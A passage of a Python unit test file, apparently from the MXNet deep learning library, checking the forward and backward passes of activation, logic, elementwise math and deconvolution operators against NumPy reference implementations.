# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(ya.shape, dtype=dtype)],
[g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(ya_full.shape, dtype=dtype)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z._simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar._simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar._simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y._simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed._simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test._bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test._bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv._bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv._bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv._bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
